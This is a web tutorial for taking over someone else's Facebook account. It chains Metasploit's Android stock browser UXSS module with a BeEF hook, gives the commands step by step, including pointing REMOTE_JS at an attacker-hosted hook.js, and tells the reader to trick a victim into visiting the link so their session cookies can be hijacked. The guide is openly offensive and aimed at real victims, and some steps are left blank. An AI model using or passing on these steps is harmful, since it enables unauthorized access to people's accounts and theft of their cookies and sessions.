There are tons of articles out there for articles on how to hack Facebook accounts and how to hack Facebook passwords. Many sites are even asking for money and surveys. Especially the Facebook online hacker tools that clam in to hack facebook just be using the victim’s username. These are fake.
Do not fall victims to these scams. There is no magic facebook hacking method. There are only some methods of exploiting vulnerabilities of Facebook, systems, and browsers and our dear old friend social engineering, which can be used to hack Facebook passwords.
Frameworks like Metasploit and BeEF can be used to hack a Facebook account via the browser. We will describe the method for the same in this article.
So with that out of the way, I will show you how you can hack Facebook with Metasploit and BeEF exploitation framework.
Table of contents
- Step 1: Start Kali Linux and open Metasploit
- Step 2: Find the right Exploit to use
- Step 3: Get the Exploit Info
- Step 4: Show and configure options
- Step 5: Open BeEF framework
- Step 6 Setting JS to BeEF Hook
- Step 7: Running the Metasploit Web Server
- Step 8: Wait for the victim to visit the Website from an Android Browser
- Step 9: Hooking the browser on BeEF via Metasploit
- Step 10: Now verify if the hooked Browser Is Authenticated with Facebook
Following are some of the requirements you need to meet:
- Install Kali Linux
- Have a good Internet Connection
- Have patience
Following are the steps to use to hack Facebook using Metasploit
Step 1: Start Kali Linux and open Metasploit
Let’s startup our Kali machine and then open Metasploit. By default its available on the left-hand sidebar. The one with a big “M” is Metasploit
You can also use the terminal to start Metasploit with the following command:
kali > msfconsole
Step 2: Find the right Exploit to use
Next, let’s find the perfect Exploit for this hack. In our case the exploit is the:
Let’s load that exploit by typing the following command:
msf5 > use auxiliary/gather/android_stock_browser_uxss
Step 3: Get the Exploit Info
Now that we have loaded the exploit module, let’s get some detailed information on this exploit. We can do this by using the following command:
msf5 > info
As you can see from this info page, this Exploit is targeted at kit kat android version 4.4 stock browser. You can read all the relevant information on Metasploit terminal, as shown below.
Step 4: Show and configure options
Next, let see the options we need to set for this Exploit to work.
We need to set the “REMOTE_JS” setting shown below to hook the victim with BeEF.
Step 5: Open BeEF framework
Now, open BeEF (Browser exploitation framework). By using this tool, we can easily hijack the victim’s browser and get all the passwords and cookies.
You can open BeEF, as shown below.
Once you open BeEF, it will ask you to enter a new password.
Once you have done that BeEf server will start and you will see the following page:
The default credentials are “beef” for username and the new password you just set.
Step 6 Setting JS to BeEF Hook
Back to Metasploit console now. To hack the victim’s Facebook account, we need to get access to the victim’s browser data. For this, we need to set the REMOTE_JS to the hook on BeEF.
For using this hack, make sure you use the correct IP:
syntax: set REMOTE_JS http://yourip:3000/hook.js
So in my case, this Metasploit command becomes
msf5> set REMOTE_JS http://192.168.128.182:3000/hook.js
Now, we need to set the URIPATH to the root directory /.
msf5> set uripath /
Step 7: Running the Metasploit Web Server
Now we need to start the Metasploit web server which will host the BeEF hook so that when anyone visits our Website, their browser will be hooked to BeEF.
Start the server by using the Run command
msf > run
Step 8: Wait for the victim to visit the Website from an Android Browser
This step requires social engineering. Make sure you make the victim click the link by using attractive and catchy colours and stuff.
Step 9: Hooking the browser on BeEF via Metasploit
Step 10: Now verify if the hooked Browser Is Authenticated with Facebook
Once the browser is connected to BeEF, you can see the browser as shown below. You should able to see multiple options to hack the victim and open their account. Or steal their cookies.
Check the detect social networks option. By using this option you see and hijack their facebook session.
Congratulations, you have successfully learned hacking facebook accounts with Metasploit and BeEF framework. You can learn more about facebook hacking from the link below:
If your account was hacked then you can recover the account by using the following article:
In the recover facebook article, we have given numerous ways to recover your hacked facebook account.
If you are loving our content then don’t forget to support our website via donations . Happy Hacking !